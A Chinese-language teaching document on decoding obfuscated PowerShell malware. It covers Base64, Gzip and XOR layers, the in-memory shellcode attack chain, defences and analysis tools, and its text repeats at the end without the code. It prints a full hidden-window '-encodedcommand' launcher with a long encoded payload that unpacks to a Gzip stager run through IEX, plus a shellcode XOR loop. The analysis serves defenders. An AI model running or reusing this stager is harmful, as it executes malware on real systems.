Powershell混淆代码的解码过程
字数 1012 2025-08-05 00:16:39

PowerShell混淆代码解码过程教学文档

1. PowerShell混淆技术概述

PowerShell的混淆技术常用于绕过安全检测,主要包括:

  • 编码混淆:使用Base64、Gzip等编码方式隐藏真实代码
  • 字符串分割:将命令拆分为多个部分
  • 变量替换:用随机变量名替换敏感字符串
  • 加密:使用XOR等简单加密算法

微软在高版本PowerShell中增加了日志记录功能(如Transcription、ScriptBlock日志),促使攻击者使用更复杂的混淆技术。

2. 关键参数解析

  • -nop:不加载PowerShell配置文件
  • -w hidden:隐藏执行窗口
  • -encodedcommand:执行Base64编码的命令

3. 解码流程详解

3.1 初始Base64解码

示例攻击命令:

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWAA3ADMATwBpAFMAQgBQACsASABQADgASwBQAHEAUgBLAHEAVABXAGUARQBjADAAbQBlADcAVgBWAGkAdwBxAEsAQwBrAG4ARQAzADcAbABVAGEAcABnAFoARQBRAE0ARAB3AGkAQwBRADIALwAzAGYAcgAwAEgATgBaAFcAKwB6ADkAMgA3AFYAKwA3ADUAVwBVAFEANAB6ADMAVAAzAGQAegB6AHoAZAAwADUAaQBVAFgANQBnADgAZABEAEQAWABmAFUASwBGAGkAeABrAE4ASQA4AGQAbgBRAHEATgBVAE8AdQAvADYARwBoAGMAKwBDADEALwBLAHAAWABYAE0ATQBNACsAbgA4ADgARwBUAFQAZgBsAFQARQBQAHIANABDAFIARQBTADAAaQBnAFMALwBpAHkAZAAzAGEARQBRAGUAVQBMAGwAZgBJAC8AQwBKADgAOABuAHMAVQB1AHIAUQB2AEcAUwBDADEASQBTAGgAMQBRADgATwB5AHUAZABGAFYATQB4AGkAOQBDAGEAUABqAEgARQBuAFQAMQA5ADgAaQBqAGYAKwBDAFMAQwBqAFMAbwBQAGMAaABCADAAZgBRADgANQA3AFAASABUAHAAMAA0AGMAaABwAFQAeAB3ADMAdQB0AFIANwBrAGMAUgBkAFMAegBYAEkAZABHAEYAVgBIADQASwBzAHcAMwBOAEsAUQBYAHQAOQBhAFcAWQBpADcAOABLAFoAdwAvADEAWABxAHUAYgB5AEgAMwBLAEoAWgAxAEUATgA1AEEAUQBEAEkAagArAGQAcgBJAHgAeQBpAFAAbwBHAFkARwByAHMATQByADUAVAAvACsASwBJAHMAUABGADUAZQBQAE4AVwBVAFgASQB6AGUAcQBsAE0AMABzADQAdABTAHIARQBkAGMAdABpADgASQAzAE0AZAA5AHcAawBnAFcAMABVAHQAWQBkAEgAUABxAFIAdgArAGEAMQB1AGMATwBrAFIAbQAxAGEAZQBHADgAVQB6AHUAcwBIADMAOAB2AGkATQBUAEkANwBRAEIARABIAHoANABQAE0AcgBSADUAMABLAG0AVQBZADMAZwBFADIAOABnAEgARABjAGwAVgA0AHkAUABkADcAZQBIAHcAVQB2AHIAeAA2AE0ANAA0AFoAZAB6AHgAYQAwAHgAaQBuAG8AUgArAFkATgBOAHcANwBtAEUAYQAxAFAAbQBMAEUAcABXAE8ANgBCAHIAVgB5AEIATQBmAEgANwBMAEkASQBUAG8AUwBVAHgAeQBFAFQAVAByADYAQQAzAHQANQAvAHAAcABWAHoARgByAHQAdQBGAGUAdwArAC8ASwByAGQAeAA0AHAAQgBrAHgATwA0AHYANgBwAFUAZQBhAHMARQBVAG4AYwA4AEYASwB0AEgAVAB2AHcASwBIAEgAcgBCAG0ANABNADUAQwBPAGMASAA3ADkAKwBRAFMANABUAGYARAB3AFEAVABTADkAOQBLADcAMQBDAFYAVQBKAGYAYQBpAE4ATQBuAEQAdgBpACsANABXAHIAcAA3AE8AeQBoAEcARgBLAEkAcAAzAEwAbgBSADAANgBoADkAMQBtAG8AVgB3AFUAZABuAEUARABjAEQANwBQADgATwBDAGQAaABUAE0AWABIAHYAOAAvAG4AcwBPADEASgBNADYAcgArADEATgBEAGwAUwBlAHUAbwBjAHoAaQBlAGcAeAArAGYAaABZAGUAWgA3ADUARABIADAAcABsAFkATwByAEkAbgBuADMAKwB5AFkAcwBjAGwATgBNAHoAWABmADUANABOAFgAYgBwADIARwBPADEAbQBEAEgAawBPAFAAaABHACsAOAB0ADYAWgAwAGIAVgBMAEMAegB4AHEASgB6AEUARAAvAEsAeQBVAGoAdwB1AFUAZABJAC8AbwBsAEgATgBBAEgAMwA1AFUAVQB6AHkASAB2ACsAcQAyAEQAOAA3AEoARwBNADQAOQBBAHEAKwBBAEUAdQBMADMAegBoAHoATwBzAEYATABXAG0ARQA0ADkAdwBPAC8AdwBEAGoAUQA5AFgAMABPAGEAMABaAFAAMABNAGIAVwB5ADAAKwA3ADUAZQA4ADcAbABqAG8AdQBpAHEAQwByAGMAeABaAEQAbgB1AEMAcQBZAEYATABtAFUAVgBBAFcAWgBSAGMANQB4AFMAWQA2ADUAWAB3AHoATABmADcAdQByAHgAeQA1ADMATQBJAHIANAB5AGQAeQBqACsAQQA2AGsAeAA2ADAANwBQAG8ATwBNAGkAVABHAGMATABzAEEAdwBNAFEATwBLAEgAZQBUAG0AcQBGAFMARgB2AGsATgBvAE8AegBNAGQAKwArAFIAQwArAFYAMQBNAE8AcwBoADEASQBlAFgAQQAwAGgANwBPAEIARwBaAHkATABFAHkAZQBjAHkAWQBrADEAWAAvAHkAUQA2AHkAWgBsAEcAdABlADQARgBJAFAAcABJAHMAcQBwAEwAcgBJAGgAcABwAHoAegBLAGkAQwBiAHMAaQBtAHAAUAB3AHYAYgBwAC8AeQA1AEoAQQBVAE8AVgBZAG4AawBOADQANABEAFEAUQB3AFgAWgA5AFgAaABaAGsAVABjAHEAaAByADUAZQBvAFAAeABQAHYAdgAzAFAAdQArAHgASAB6AG4AWgBpAGUAawB4ADQATwBzAEYASQBuADQAMABNADUANABuAGkANgBGAEoATQA0AHYAbAA4ACsAdgBXAEIAYgBJAGgAUgB4AFEAVQAwAFAAZgBhADYATwBJAFgAagBYAE4AbwBvAHgAVgB5AHQASgAxAHYATgBNAHkAZgBYAHQALwBGAGYAYQBVAHYAZAByAGYAOQBaAFUASgBQAEgAdAA0AHAASgAyAHEAagBFAGEARABjAGQAQQBlAGoANwBBAFMAMwA5ADcAMQA2ADQATwAxAGQAbgAvAGQAYgBjAFoASgByAE0AVwBUAGQAbAAxAFMANgB5AEQAMwBzAHUAcwBwAGEAMgAxAC8ANgB5ADgAdgBZADYAOQA1AFMAUQBKAHQAYgA4AEIAYwA5AEgASABYAGoANwByAGEAdgBpAHYAMwBHAHoAdABmAHYAYgBLAGQAbQA2AE8AZABnAC8ANgA5AGwAVgB4AGEAQwAwADMAOQBhAFAAWABVAFoAbgA4AFcAcQBiAGwAOABYADkAdQAzADEAVgAzAG4AeABvAGYAeABiADkAcQArADQAdwA5AEEANwAvAG8AcQBZAE8AMgBFAE4ASwBrAHkAdQBLAEsATABFAFUANABrAGYAawAyAFIAbgBXAGIARAAyAFEAZQB6AGYAdABtAGIAWgBjAFoAbwBwAGcAUwBHAHkAYwBqAEkAdQByAHgAWABCADgAWgBMAFEAKwBGAHAAbgBmAFQASABkAGEASgBFAEsAegBMAGIASwBkAEsAZABOAFEAdwBnAFQAawAyAHkAegBTAHMAMgB5AEUAeQB6AG4AZQBGAG4AbgB1AFcAeAA0ADcANAB4AEkAcwBQAGQAZABZAHUAOABOAEQATABWAGEAQQBJAE8AcQBaAG4AcABtACsAVQBWAFMAZgBGAEMAVABmAEQAQwBHAEcAWAA5AHAAZABFAEQAdQA3AHQANABiAGoAZgA3AHUAaQBtAEIAYgBaAE8AawBDAcwA3ACsATAA2AFYAawBNAGEAQQByAHgAcQBEAGQASgBXADAASABHAHQAQgBkAG0AUQBlAHAASQBUAEoAdAA2AFMAeABTAGsAagBTAGMAcABGADMANAA4AGsAMgBDAFQAdQA5AGEASwBDAGwAcQAwAGgAbQBlAGsAKwBUAFYAdgBkAGoAVgA3AGwAZABQAG8AOQA3AGsAeABsAGUAeQBZADIAVwBQAHAAOABHAGQANQBPADYAcABxAHQASgBmAFMASQBuAFgASgA0AG8AcgBjAG0AOQBTADQAYgAzADAANQB0AGUAVAB6AFoAaQAzAEEAcwA4AE8AWQAwAE0ASgBiAFcANwBCAE0ANQBqAFgARQArAG4AVQA5AG4AZwBKAE4ASABuADMAYgBHADIAbABDAFUAeQBOAHAAOQBKAGIAcQArAHcAQQBUAHIANwA1AFYAeABOAHIAZgA0ADQAVwBUAEYAbABPAEgASwBlAHQANgBxAFgAZABIAEMAeQAyAGkANgBaADAAVgBTAGwAbQB4AGUANgBpAE8AWgBxAHcAbAAvAFcAOQAvADUAMAAyAFoATwBIAEsAbgBCAGwANQBRAFgAMgBrAGkAbQAzAHUARQA4AGMAYQAwADQAYwBQAE0AZQAzAFMAKwA5AFMAUQBtAHkAMgB3ADQAdABWADAAbQBYAEUAdwAzADEAOAB1ADUAbwBIACsANQBXAHQAOQBWAEcAeQBDAFQAdgBtAC8AeAArAHoAWgBXAFAAdwBRAHQAdgBrAE4AeQB5ADUASAA5AFUATgBIAG0ARwBwAFAAbABSADcAYgBSAHYAcwAwADMAWgBqAHQAVgB2ADIAQgBtAG0AWAB0AFMAWAB3AGwAUwAyAFoAeQByAHIAZQBnAEoATgBHAGMASQBtAFkAMgBzAEIAeQBTADEAcgBCAFcAdABlAGIANwBhAHoARwBzAHQATgB1AFIAQgBwAEsALwBvAEUASAA4AEwAegBlAFEAbQAwAEMAUABEAFgAbgB4AGsAaAA3AEEAVAA3AFgAbwA2ADMAVwAwAEwAZABFADQAUgA4ADMAVQByAGMASABQAEUAdwA4ADQAQQB2AHcAeQBQAG4AQQBCAHMAawB1AEEAcAA1AG0AZQBsAGYATABqAEoAeQByAEsAVQBkAGgAdQArAEQAcQA1AGQAcgBkAGQAZQA2AGQANQB0AEQAYQB6AHEATABWAHgANgBZAGUARAB5AFgAKwBnAHAAVwBOAGIAaQBnAGIAMwArAGkAbAA4AEQALwBHAFYAcAA0AGYAOABIAHoATwBxADkASABhAEQANgBHAC8AUwBQAE0ANwArADMAYwBCAC8AaQA5AGMATAByAHoAVwBHADYAZwB5AFUATQBEAHkAKwBRADgAZgB4AFAAegBlAGYAMQAxADUATwBFADgAZgBUADMAMwBhADYALwB1AEYAbABZAEkAMQBxAFoAWABYAHIAbQBKAGwAagA5ADUAVQByAEoAOAAxAFAAegBvAEsAbwB3ADEAeQBvAFoASgBCAEEAMwBPADYAZgBsAFEALwBWAEkAOQB0AHkASgAzAHYANQBCAHEAVgB5AHYAdQBkADgAegBNAE4ARwBYAFcAaABxADQAUwArADgAMQBTADAAWgBkAGYAMQBjAGQANAA0AC8AYQBTAEQAZwBUAGIAdQAwAEYAdwA5AHcAdQBVADAAaABhAEgAVQBlAEgAYwBrAEMAcQArAEMAMABDADAAZABZAHIATABpADkAYgBwAG8ATABvADQAUgBuAG4AcQBzAGsAKwBDAG4AVAB5AHMASQByAC8AbwBHAHgAQgBGAGwATgB0ADkAVQBoAFgAbwBxADEAZQB2ADEALwBMADkAWgBGADAAdQAvAEQAawB2AEgARAA3AEwASwBxADcAbABxADMAbAB5ADkAOABlAFQAdABUAG0ANgB4AGsAMwBoAEUAUAA0AHkAWgBSAC8AKwBIAEIALwBEAGQAcAB2ADgAWgAyAGgAeQA4AG8AagA5ADcAaABhADUAdwA2AEgAMgA4AHgARgBMADUAUwA2AG0AawByAFkAVQAzADgANQBIAHoAQQBsADgAZgBkAEMAZABjAEYAOQB5AEwAZwBPAGIAOABZAHUAdABiADgASwBsAFMAMwBMADIAVgBjAHkAUQBLAG0AcgBJAFEAegBwAEgAdwBUAGIAaQBBADgATwBSAEkAYQBzAEQAMwBTAG0AagBIACsAVQBVAHMASABEADYALwB2AGcAbwBKAGMAZwA2AEsAWAA0AFUAeAB4AFIAVABhADUANAB1AEIAYgB3AEYATABLAGYAUgBUAHUAZQBuAEMAUwBDADQATQBjADMAOABCAGsAdwBzAC8ANQA4ADgATgBBAEEAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBu

解码方法:

echo -n "JABzAD0ATgBlAHcALQBPAGIAagBlAGM..." | base64 -D
3.2 Gzip解压缩

解码后得到包含Gzip压缩的数据(以H4sIAAAA开头):

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAA..."))
IEX (New-Object IO.StreamReader(
    New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress)
)).ReadToEnd()

解压方法:

echo -n "H4sIAAAA..." | base64 -D | gunzip
3.3 XOR解密

解压后可能遇到XOR加密的Shellcode:

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMj...')
for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

解密步骤:

  1. 使用PowerShell ISE调试
  2. 将解密后的数据写入文件:
[System.IO.File]::WriteAllBytes("C:\decrypted.bin", $var_code)

4. 完整攻击链分析

  1. 初始执行:通过-encodedcommand执行Base64编码的命令
  2. 内存加载:使用IO.MemoryStream加载第二层Base64数据
  3. 解压缩:通过Gzip解压获得实际PowerShell脚本
  4. Shellcode解密:XOR解密最终的Payload
  5. 内存执行:通过VirtualAllocCreateDelegate在内存中执行Shellcode

5. 防御建议

  • 启用PowerShell日志(ScriptBlock日志、模块日志)
  • 限制-encodedcommand参数的使用
  • 监控异常进程创建(如powershell.exe生成子进程)
  • 使用AMSI检测恶意脚本

6. 工具推荐

  • PowerShell ISE:用于调试和分析脚本
  • CyberChef:在线解码Base64/Gzip数据
  • Process Monitor:监控进程行为

附录:常见混淆特征

  1. 长Base64字符串
  2. 包含FromBase64StringGzipStream
  3. 使用-bxor等位运算
  4. 调用VirtualAlloc等内存操作API

通过以上步骤可完整还原攻击者使用的Payload,提取C2地址等关键信息。

PowerShell混淆代码解码过程教学文档 1. PowerShell混淆技术概述 PowerShell的混淆技术常用于绕过安全检测,主要包括: 编码混淆 :使用Base64、Gzip等编码方式隐藏真实代码 字符串分割 :将命令拆分为多个部分 变量替换 :用随机变量名替换敏感字符串 加密 :使用XOR等简单加密算法 微软在高版本PowerShell中增加了日志记录功能(如Transcription、ScriptBlock日志),促使攻击者使用更复杂的混淆技术。 2. 关键参数解析 -nop :不加载PowerShell配置文件 -w hidden :隐藏执行窗口 -encodedcommand :执行Base64编码的命令 3. 解码流程详解 3.1 初始Base64解码 示例攻击命令: 解码方法: 3.2 Gzip解压缩 解码后得到包含Gzip压缩的数据(以 H4sIAAAA 开头): 解压方法: 3.3 XOR解密 解压后可能遇到XOR加密的Shellcode: 解密步骤: 使用PowerShell ISE调试 将解密后的数据写入文件: 4. 完整攻击链分析 初始执行 :通过 -encodedcommand 执行Base64编码的命令 内存加载 :使用 IO.MemoryStream 加载第二层Base64数据 解压缩 :通过Gzip解压获得实际PowerShell脚本 Shellcode解密 :XOR解密最终的Payload 内存执行 :通过 VirtualAlloc 和 CreateDelegate 在内存中执行Shellcode 5. 防御建议 启用PowerShell日志(ScriptBlock日志、模块日志) 限制 -encodedcommand 参数的使用 监控异常进程创建(如powershell.exe生成子进程) 使用AMSI检测恶意脚本 6. 工具推荐 PowerShell ISE :用于调试和分析脚本 CyberChef :在线解码Base64/Gzip数据 Process Monitor :监控进程行为 附录:常见混淆特征 长Base64字符串 包含 FromBase64String 和 GzipStream 使用 -bxor 等位运算 调用 VirtualAlloc 等内存操作API 通过以上步骤可完整还原攻击者使用的Payload,提取C2地址等关键信息。